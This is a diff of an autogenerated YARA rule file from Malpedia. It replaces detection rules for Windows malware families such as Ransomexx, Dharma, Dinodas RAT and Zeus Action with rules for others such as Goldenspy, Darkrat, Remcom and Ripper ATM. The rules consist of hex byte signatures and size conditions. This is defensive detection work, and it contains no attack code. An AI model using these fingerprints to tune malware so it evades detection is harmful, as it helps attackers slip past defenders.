+		$sequence_4 = { 0f87e4010000 498bc8 e8???????? 49897f10 49c747180f000000 41c60700 }
+		$sequence_5 = { e8???????? 660f6f05???????? f30f7f4588 c644247800 498b5618 4883fa10 0f82e2010000 }
+		$sequence_6 = { 488d1560b90100 c4e2c9abe9 c4817b1004c1 c4a153581cc2 c5f928cb c5e35cda c4e2c9b905???????? }
+		$sequence_7 = { 4c8d0dc8ca0100 8bf9 488d158f860100 b903000000 4c8d05abca0100 e8???????? 488bd3 }
+		$sequence_8 = { 4053 4883ec20 84c9 752f 488d1d2b730200 488b0b 4885c9 }
+		$sequence_9 = { 4883c510 4c8d15f06b0300 48836c243001 0f8564feffff 4c8bc6 448d4a04 4c8d15d66b0300 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 580608
 }
-rule MALPEDIA_Win_Logtu_Auto : FILE
+rule MALPEDIA_Win_Goldenspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "94e45298-e780-5ad6-8cab-2da098818af3"
+		id = "5e7dd5e3-178b-5910-8098-c42b951969b2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.logtu_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.goldenspy_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "b14516261bf7c410bd1f687a208584a9b7a9e03096d2ecbcc28b896d23b0142d"
+		logic_hash = "b60928ded54ec1e6882e1e84d68fbc49ae085baf6e4863bae7fd0036613f3bf4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98650,71 +98737,69 @@ rule MALPEDIA_Win_Logtu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 8d85fcf7ffff 6800040000 }
-		$sequence_1 = { 6a64 6a00 ff15???????? 85c0 7509 8b45bc }
-		$sequence_2 = { 8d8534ffffff 50 ff15???????? 6a01 8bf0 8d85a4fdffff 68???????? }
-		$sequence_3 = { 50 8d8574faffff 50 8d8534ffffff }
-		$sequence_4 = { 6a01 8bf0 8d85a4fdffff 68???????? 50 ff15???????? }
-		$sequence_5 = { 56 ff15???????? 56 ff15???????? 8b45f8 5e 8be5 }
-		$sequence_6 = { 50 8d8534ffffff 50 8d8514fcffff 50 }
-		$sequence_7 = { 50 e8???????? 8d85fcf7ffff 6800040000 50 }
-		$sequence_8 = { ff15???????? 56 ff15???????? 8b45f8 5e 8be5 }
-		$sequence_9 = { 50 ff15???????? 6a01 8bf0 8d85a4fdffff 68???????? 50 }
+		$sequence_0 = { 8d8d00ffffff e8???????? 8d4638 c645fc1d 50 8d8d18ffffff e8???????? }
+		$sequence_1 = { 50 e8???????? 83c404 c786c800000000000000 83bed000000000 7413 8b86cc000000 }
+		$sequence_2 = { ff4724 83fa10 7228 8b4dd0 42 8bc1 81fa00100000 }
+		$sequence_3 = { 68???????? e8???????? a1???????? 83c40c c787d400000004000000 53 ffb7cc000000 }
+		$sequence_4 = { 6a00 6a02 c745fc00000000 ff15???????? 8b95b8feffff 8bd8 83fbff }
+		$sequence_5 = { 83c408 c3 8b4df0 e9???????? 8b4df0 83c14c }
+		$sequence_6 = { e8???????? 83c408 c3 6a10 8b45f0 }
+		$sequence_7 = { 745f 51 c745fc00000000 e8???????? 83f8ff 7459 8b450c }
+		$sequence_8 = { 8d8d18ffffff e8???????? 8b55ec 83fa10 7228 8b4dd8 }
+		$sequence_9 = { 8b01 8b400c ffd0 8945e0 8d45e0 c645fc2c 50 }
 
 	condition:
-		7 of them and filesize < 924672
+		7 of them and filesize < 1081344
 }
-rule MALPEDIA_Win_Diceloader_Auto : FILE
+rule MALPEDIA_Win_Unidentified_089_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "593cd06d-f8dd-5a0b-859e-ad7b04c5325f"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.diceloader_auto.yar#L1-L120"
+		id = "f61e4a77-808b-5e07-801b-03e57ce838b5"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_089_auto.yar#L1-L98"
 		license_url = "N/A"
-		logic_hash = "e070fb94fcf5f24a6795b4dab69a3a87130002e18415d4a25f346061fa315110"
+		logic_hash = "f9666eb88fbd91e0eb2e4b4c8812230b36d73d66192fed407aecfaa8f0ed362a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bf8 895808 89680c e8???????? }
-		$sequence_1 = { 4885c0 745a b924000000 e8???????? 0fb6c8 ba01000000 6bc107 }
-		$sequence_2 = { 895808 89680c e8???????? 48894710 488d4f1c }
-		$sequence_3 = { 4889742410 48897c2418 4156 4883ec30 8bf2 ff15???????? }
-		$sequence_4 = { 0f8483000000 8b5de8 3bf3 7c81 448b6dd8 41b81e000000 488d4d58 }
-		$sequence_5 = { 41b9983a0000 488d1daa2a0000 8bcf 488bd3 ff15???????? 488b0b ff15???????? }
-		$sequence_6 = { 468b540324 4d03c8 4d03d0 418b11 }
-		$sequence_7 = { b001 eb45 8b410c 99 2bc2 }
-		$sequence_8 = { 448b541620 8b5c1624 4c03d2 4803da 4533c9 458d7901 458b02 }
-		$sequence_9 = { 4983c602 4c03f7 498bd6 ffd5 }
+		$sequence_0 = { 889dd4feffff 899d84feffff 898588feffff 889d74feffff 33c0 }
+		$sequence_1 = { 8b4508 e8???????? c20c00 e8???????? cc 6a30 }
+		$sequence_2 = { f2e9e3000000 55 8bec eb0d ff7508 e8???????? }
+		$sequence_3 = { 83f904 0f8582000000 8b75d0 8bfb }
+		$sequence_4 = { eb0f ff7634 57 ff562c }
+		$sequence_5 = { 88041e 880c1f 0fb6041e 8b4dfc 03c2 8b550c }
+		$sequence_6 = { 3dffffff7f 0f87a2000000 03c0 3d00100000 7227 }
+		$sequence_7 = { 56 6a01 8d4dec 8975d8 }
 
 	condition:
-		7 of them and filesize < 41984
+		7 of them and filesize < 389120
 }
-rule MALPEDIA_Win_Ransomexx_Auto : FILE
+rule MALPEDIA_Win_Smominru_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2fe059c2-8452-5b3e-8480-0e870f1f94ef"
+		id = "c1a10c0a-1a81-5633-ba39-5fbcedc45f65"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ransomexx_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smominru_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "f81d34b7c74a7d97ad1f03442803ea61bc2884bb95c0d382a5757d938c26aeda"
+		logic_hash = "e46f6fcc506b8533ee7578778771fd23a12eff0b58e9a48260ec14f4febd7c2f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98728,32 +98813,32 @@ rule MALPEDIA_Win_Ransomexx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 897708 8d7b50 3bfe 7439 8b4f08 3bce }
-		$sequence_1 = { 3bc1 744b 8d542420 52 }
-		$sequence_2 = { 13542440 894838 8b4c247c 034c242c 89503c 8b942480000000 13542430 }
-		$sequence_3 = { 57 8d45e0 e8???????? 8bf8 83c404 3bfb 0f8506020000 }
-		$sequence_4 = { 83c204 c6462400 8955f0 8b5dfc 8ad0 80e27f 029018b44100 }
-		$sequence_5 = { c1ee03 33fe 03df 8b7dfc 039c3db8feffff 8bb43d94feffff 03f3 }
-		$sequence_6 = { 33f7 8b7d08 83c004 c1e608 8955ec 8945fc c1ef08 }
-		$sequence_7 = { 89442440 89442444 89442448 e8???????? 83c40c 83bc248800000000 8d842490020000 }
-		$sequence_8 = { 83c404 85c0 7539 8b55fc 8917 5f }
-		$sequence_9 = { 8975dc 3338 8bda 897dec 8bfe c1ef10 81e7ff000000 }
+		$sequence_0 = { c745fcfeffffff e8???????? 8b45cc e8???????? }
+		$sequence_1 = { ff15???????? 85c0 0f8d76d9b07b 50 e8???????? 33c0 c9 }
+		$sequence_2 = { 8b45bc 03c7 3bc7 0f828e47ab7b 3bd8 0f878647ab7b }
+		$sequence_3 = { 8d7f00 55 54 5d 56 57 }
+		$sequence_4 = { 8b55c8 3bd6 0f858017ac7b 8b5dd4 }
+		$sequence_5 = { 0f85514ac17b 53 33db f6464801 0f85884ac17b }
+		$sequence_6 = { 8b85f0fdffff 894620 8bc3 5b 8b4dfc 33cd }
+		$sequence_7 = { 0f844a4ac17b 3bc3 0f846d4ac17b 8a4807 }
+		$sequence_8 = { 8d43f8 80780705 0f848992c17b f640073f }
+		$sequence_9 = { 85f6 0f84173ea97b 6a00 56 e8???????? 85c0 0f8412b5ac7b }
 
 	condition:
-		7 of them and filesize < 372736
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Zeus_Action_Auto : FILE
+rule MALPEDIA_Win_Darkrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8b9574e-a0e7-5ba7-a640-3d17643b0cca"
+		id = "d801447e-13d8-558d-ac93-3bc625f7fc26"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_action_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkrat_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "3c34c6384d3102dcf930744109cb986bdc2576d8925ca3fbe6fecc099028fdf3"
+		logic_hash = "e8461586b168e71b04b888d3fef9b643bcbbe5ebaeef3515951b1dcd9d78d8ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98767,32 +98852,32 @@ rule MALPEDIA_Win_Zeus_Action_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 57 ff15???????? 85c0 0f4975e8 57 e8???????? }
-		$sequence_1 = { 8995c4feffff 8b75f4 4e 0f8494010000 8b83a8020000 83f8ff 0f840d010000 }
-		$sequence_2 = { 731b 2b45d8 6a20 03c8 894df4 5b 85f6 }
-		$sequence_3 = { 8bec 81ec10050000 53 33db 817d180000a000 56 57 }
-		$sequence_4 = { eb17 897e0c 897e08 897e04 893e 897e2c }
-		$sequence_5 = { d1e9 03c1 99 f7ff 8b7d10 8a4f0c d3e0 }
-		$sequence_6 = { 8d1c79 3bcb 7320 8b5508 0fb706 83c602 668b0442 }
-		$sequence_7 = { 59 89442408 85c0 7506 40 e9???????? e8???????? }
-		$sequence_8 = { 1bc0 f7d8 59 59 7514 3974240c 740e }
-		$sequence_9 = { 53 56 8b35???????? 57 68???????? ff7508 8d85a4fbffff }
+		$sequence_0 = { 8b75b8 8b4314 0f43d6 8b7b10 2bc7 8b4dc8 }
+		$sequence_1 = { 85c0 7446 8bd0 b805000000 2bd6 8a0e 8d7601 }
+		$sequence_2 = { 83f801 751f 6a0a 68???????? 8bcb e8???????? }
+		$sequence_3 = { 3bf2 0f8211010000 2bf2 8d45d8 b901000000 3bf1 0f42ce }
+		$sequence_4 = { 85c0 7413 8b4904 8b00 8b4c3938 }
+		$sequence_5 = { ff15???????? 85c0 7445 8bc6 }
+		$sequence_6 = { 57 50 8975fc e8???????? 8bd0 }
+		$sequence_7 = { e8???????? 8b551c 83fa10 72bd 8b4d08 42 8bc1 }
+		$sequence_8 = { 6a00 8945ec ff15???????? 8bd8 85db 7462 }
+		$sequence_9 = { 8b8d68ffffff 8bc2 2bc1 57 3bf8 7731 8d040f }
 
 	condition:
-		7 of them and filesize < 827392
+		7 of them and filesize < 884736
 }
-rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE
+rule MALPEDIA_Win_Remcom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3767f57e-77fd-50ff-a070-72ae08d30433"
+		id = "ef2d4f9d-a666-5fde-8a7c-ad9caf209507"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dinodas_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dinodas_rat_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remcom_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "d711c805d5ef765c5b6b2b0b58b4e9853b9a582e9b5d986c36d846c104a514b8"
+		logic_hash = "da940079f0fa67fd9b07a963cb1c1d587eae7e882a70fa0b1512503623264f37"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98806,32 +98891,32 @@ rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4598 e9???????? 8d75d4 e9???????? 8d75b8 e9???????? 8b542408 }
-		$sequence_1 = { 83c404 8b8c240c0c0000 5f 5e 5b 33cc 33c0 }
-		$sequence_2 = { 8b5010 8965b0 8965b0 ffd2 837efc00 8d4efc }
-		$sequence_3 = { 33c0 c745e80f000000 8945e4 8845d4 33db 8b5604 8b75cc }
-		$sequence_4 = { 0bca 7d09 8bc7 8bcb e8???????? 8b450c 8b1b }
-		$sequence_5 = { 8dbd9cfdffff e8???????? 8b959cfdffff 8b4af4 8b8590fdffff 83c120 0108 }
-		$sequence_6 = { ff2485769c4200 33c0 838df4fbffffff 898598fbffff 8985b0fbffff 8985d8fbffff 8985dcfbffff }
-		$sequence_7 = { 57 50 8d45f4 64a300000000 8bf1 33ff 8bc6 }
-		$sequence_8 = { e8???????? c645fc01 8b45d4 33db 837de810 895dd0 7303 }
-		$sequence_9 = { 89442428 8d4c2420 51 8d542414 68???????? 52 c644247402 }
+		$sequence_0 = { 8b4dec 8b55e8 8b1d???????? 8d45ec 50 51 }
+		$sequence_1 = { 8955f8 c745fc01000000 ff15???????? 8bf0 85f6 74a5 }
+		$sequence_2 = { 8b55e4 8b45d0 52 50 ff15???????? 85c0 }
+		$sequence_3 = { 8d45e0 50 c745f400000000 ffd7 6a01 6a00 }
+		$sequence_4 = { 8b07 8b5704 51 50 8945d0 8955d4 ff15???????? }
+		$sequence_5 = { 56 e8???????? 8bc6 c1f805 8b0485e0fc4000 }
+		$sequence_6 = { ff15???????? 56 ff15???????? 56 ff15???????? 68???????? ff15???????? }
+		$sequence_7 = { 51 50 8945d0 8955d4 ff15???????? 85c0 }
+		$sequence_8 = { 83f9ff 7432 837e40ff 742c 83f8ff 7427 8b3d???????? }
+		$sequence_9 = { e8???????? 83c414 8b45fc ff34c52ce44000 53 }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Tclient_Auto : FILE
+rule MALPEDIA_Win_Spyder_Patchwork_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3639f84f-4aec-569c-9a4b-faa8f23f8b5c"
+		id = "79eb8f27-1301-5204-b70a-f074d773e2a2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tclient_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder_patchwork"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spyder_patchwork_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "27c191c2603bf7d7ea682fd55fb7f07be28d5958dc675e32b4f634f07d524410"
+		logic_hash = "88e656ab24018abde08f518b393d747f56ac10af0939df2743e80e35c10ea588"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98845,32 +98930,32 @@ rule MALPEDIA_Win_Tclient_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 757b 8b4d10 c701a0010000 8b4d14 c70140000000 eb67 }
-		$sequence_1 = { 03c1 3bc3 0f8fdf010000 8b5df0 0fb6041a 66c1e008 0fb7c8 }
-		$sequence_2 = { e8???????? 8d4598 8bce 50 e8???????? 57 6a01 }
-		$sequence_3 = { 0f85cc010000 8b450c 8b4d9c c1e003 3bc1 7613 83e107 }
-		$sequence_4 = { 85f6 75e3 8bc1 3bd8 740f 8bd1 8bcb }
-		$sequence_5 = { 83f802 7443 83f803 747a bf40ffffff 83ff94 7578 }
-		$sequence_6 = { 2bc7 7417 83e801 742f 83e801 }
-		$sequence_7 = { c645fc04 8d4d94 8b45e0 83c018 50 e8???????? 6800040000 }
-		$sequence_8 = { c21800 b8???????? e8???????? 81ec38040000 53 56 57 }
-		$sequence_9 = { 56 e8???????? 59 59 c70602000000 eb14 83660800 }
+		$sequence_0 = { 2bc2 50 52 51 68???????? 6a02 e8???????? }
+		$sequence_1 = { 7e23 8b37 8bce 8b542420 c1e10a 03d1 8b8a00040000 }
+		$sequence_2 = { 7409 b9f7ff0000 66214f0c 6800010000 57 56 e8???????? }
+		$sequence_3 = { c3 33c0 84db 56 0f95c0 03c7 50 }
+		$sequence_4 = { 89040e b001 5e 5b c3 8bff 53 }
+		$sequence_5 = { 8ae3 8d142e c0e404 b90f000000 83ee10 8ac4 8d52ff }
+		$sequence_6 = { 8d0c50 d1fa 0fb601 8d3483 668b8648080000 668901 0393540c0000 }
+		$sequence_7 = { ff742430 e8???????? 83c410 8bc8 85d2 0f8c8f000000 7f08 }
+		$sequence_8 = { 7410 663bc7 740b 83f801 7406 8bee 8b36 }
+		$sequence_9 = { 0f84c4000000 66837c240c01 0f85b8000000 57 8b7c2408 83c708 f644241401 }
 
 	condition:
-		7 of them and filesize < 1063936
+		7 of them and filesize < 2260992
 }
-rule MALPEDIA_Win_Zenar_Auto : FILE
+rule MALPEDIA_Win_Atlas_Agent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "911998a5-168a-5bc2-9a82-e2c3fffdd44c"
+		id = "8963b3c6-9ff3-517b-b17b-5c5871d182de"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zenar_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlas_agent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atlas_agent_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e884fb88ff5222c3dce5f2029617037692e70cee36f52d500814f26a83ec50e0"
+		logic_hash = "af8db8f42863f1a21cc132a9027166c584afcbb4de297bb22cf7a2ce6f153562"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98884,32 +98969,36 @@ rule MALPEDIA_Win_Zenar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6bc838 8b049598ae4300 f644082801 740b 56 e8???????? }
-		$sequence_1 = { b9???????? c605????????e6 8935???????? 8935???????? e8???????? 8b45ec 8935???????? }
-		$sequence_2 = { 8b07 33c9 66890c50 8bc7 397714 7202 8b07 }
-		$sequence_3 = { c745fc02000000 e8???????? 894604 83c408 8b45ec }
-		$sequence_4 = { c9 c21400 55 8bec 83ec10 8d45f8 53 }
-		$sequence_5 = { 51 50 6a30 68???????? }
-		$sequence_6 = { c20400 55 8bec 8d4178 8b4d08 50 }
-		$sequence_7 = { e8???????? 8b45fc 83c40c 895e10 894614 }
-		$sequence_8 = { 6bf638 8b0c8d98ae4300 80643128fd 5f 5e c9 }
-		$sequence_9 = { 8b4de0 8845f3 85c9 7411 8b01 ff5008 }
+		$sequence_0 = { 0fb60c0a 83e13c c1f902 03c1 }
+		$sequence_1 = { 8bc1 99 b903000000 f7f9 c1e002 }
+		$sequence_2 = { 4c8d0501c40200 488bd5 48c1fa06 4c893403 }
+		$sequence_3 = { 89858cfdffff c745b47e000000 c745b83e000000 c745bc23000000 }
+		$sequence_4 = { 89858cfbffff 6a00 6a00 8b8d8cfbffff e8???????? }
+		$sequence_5 = { 898590f8ffff 8b9590f8ffff 89958cf8ffff c645fc06 }
+		$sequence_6 = { 898590faffff 8b8d90faffff 51 8d8d60fbffff }
+		$sequence_7 = { 898590feffff 68???????? 8b8590feffff 50 }
+		$sequence_8 = { 4c8bf8 b9ee4d81b7 e8???????? 4883c428 }
+		$sequence_9 = { 4c8d0518650100 488bd0 488bce e8???????? }
+		$sequence_10 = { 4c8d050fcc0100 e8???????? 488bd3 8bcf }
+		$sequence_11 = { 4c8d0517810100 e8???????? 4885c0 740d }
+		$sequence_12 = { 89858cfdffff 8d8dc8fdffff e8???????? 8d8dc0fdffff }
+		$sequence_13 = { 4c8d0516270200 488bc2 83e23f 48c1f806 }
 
 	condition:
-		7 of them and filesize < 519168
+		7 of them and filesize < 857088
 }
-rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE
+rule MALPEDIA_Win_Mail_O_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "315509a3-d1f8-5dc1-9f12-edd6db041fca"
+		id = "22d6b28e-4151-5e9b-9587-80b5734c06d0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orpcbackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.orpcbackdoor_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mail_o_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "89d46489afd17625d89dcf271ed3d1e11fa0fe1e28ec9d95da8becb11eb31f60"
+		logic_hash = "dcb8e5253869e623d55ce118499ad5275559d95782fd4c320c46ce5ddc9c4fdf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98923,32 +99012,32 @@ rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff503c 89859cfdffff 83bd9cfdffff00 7d48 8b85d4fdffff 8b00 ffb5d4fdffff }
-		$sequence_1 = { ff15???????? 8985b0feffff 8d85bcfeffff 50 ffb5b8feffff e8???????? 85c0 }
-		$sequence_2 = { f20f59148590dc0310 660f5834c5a0e40310 660f54c5 f20f5ce8 f20f58fa f20f10d8 f20f59c1 }
-		$sequence_3 = { 8b55fc 89440ae4 c9 c3 55 8bec 83ec0c }
-		$sequence_4 = { 8d85dcf7ffff 50 8d8d20ebffff e8???????? 8d8da7e6ffff e8???????? 50 }
-		$sequence_5 = { 83b8a800000000 750e 8b04bd20cc0610 807c182900 741d 8d45fc 50 }
-		$sequence_6 = { c3 85c0 78f5 8b1cc554a30310 6a55 53 e8???????? }
-		$sequence_7 = { 8b4508 8945f4 c645f801 8b45f0 83c004 50 }
-		$sequence_8 = { 8b45fc 83c004 50 e8???????? 59 c9 c3 }
-		$sequence_9 = { e8???????? 59 8b45fc 8b4010 40 50 ff75f8 }
+		$sequence_0 = { ff15???????? 83a3980e0000fd 4889bb800e0000 488bcb 4889bb800e0000 e8???????? 488b8b60100000 }
+		$sequence_1 = { ffc7 4883c302 493bde 7cd7 488b8c24a0000000 ba01000000 448d42fe }
+		$sequence_2 = { eb2e 488d15518b1500 488bcf e8???????? 85c0 7405 830b02 }
+		$sequence_3 = { e8???????? 8bf8 85c0 7563 488d15563e1700 488bcb e8???????? }
+		$sequence_4 = { f30fe6d2 8bd7 e8???????? 03ef 85db 7ea1 2bdf }
+		$sequence_5 = { 7cda 488b4f20 488bd6 e8???????? 4885c0 0f8459020000 418bec }
+		$sequence_6 = { e9???????? 4183fd00 743e 492bed 4d8bc5 488bd5 488bcf }
+		$sequence_7 = { e8???????? b8ffffffff e9???????? 448b8c24a0000000 4183f901 746a 4c8d0578650900 }
+		$sequence_8 = { bfffffffff e9???????? f7432000010000 4889742440 740f 488bd3 488d0da3050000 }
+		$sequence_9 = { 7442 488bce 4c8d2defdb0b00 0f1f4000 6666660f1f840000000000 410fb61408 48ffc1 }
 
 	condition:
-		7 of them and filesize < 918528
+		7 of them and filesize < 5985280
 }
-rule MALPEDIA_Win_Dharma_Auto : FILE
+rule MALPEDIA_Win_Ripper_Atm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a46a081b-90b3-5009-83f4-4508f1cf18af"
+		id = "e53a9e99-401d-50a0-8b9f-eabc46d865fe"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dharma_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ripper_atm_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ffbccfb89aae24b9d0cb0290ebb9e2adf2ba122649057e830bafd37778b3a0cb"
+		logic_hash = "d8b90900e28d85311ea385a629a5f77668a5882f0cccbfa3d22ef622cc722131"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98962,34 +99051,34 @@ rule MALPEDIA_Win_Dharma_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4218 33c9 668908 8b5508 }
-		$sequence_1 = { 81e10000ff00 33d1 8b45f0 c1e808 25ff000000 8b0c85b8b34000 81e100ff0000 }
-		$sequence_2 = { 6a08 8b450c 8b4818 51 e8???????? 83c408 2500ff00ff }
-		$sequence_3 = { 51 8b55fc 52 ff15???????? 8b4df8 89048db8864100 8b55f8 }
-		$sequence_4 = { 33c0 6689044a 8b4d08 8b5104 83c201 8955ec 8b4508 }
-		$sequence_5 = { 732e 8b4df8 8a11 8855ef 8b45f8 8b4df4 8a11 }
-		$sequence_6 = { e8???????? 83c410 894590 6a02 6880000000 }
-		$sequence_7 = { 83780800 7405 e8???????? 8b4d0c 51 8b55fc 52 }
-		$sequence_8 = { 2b4224 8d4c0002 51 8b5508 8b4224 8b4d08 8b5118 }
-		$sequence_9 = { 52 8b4510 50 e8???????? 83c408 85c0 7409 }
+		$sequence_0 = { 56 ff15???????? 85c0 7413 83671000 c747140f000000 c60700 }
+		$sequence_1 = { 89742414 83cbff 395d08 7507 33c0 e9???????? 8b4620 }
+		$sequence_2 = { 7485 80f90d 7480 40 8907 e9???????? 8b4760 }
+		$sequence_3 = { 6824010000 b8???????? e8???????? 8d4508 33f6 50 ba???????? }
+		$sequence_4 = { 57 8bfe 8955f8 894dfc 897dec 3bf0 7445 }
+		$sequence_5 = { 8d45ec 50 8d4de0 c745ec00000400 }
+		$sequence_6 = { 8bf2 897518 8955f8 3bd7 741c 3b4514 }
+		$sequence_7 = { 8b148df0974400 83e31f c1e306 894df4 8a441a04 895ddc a801 }
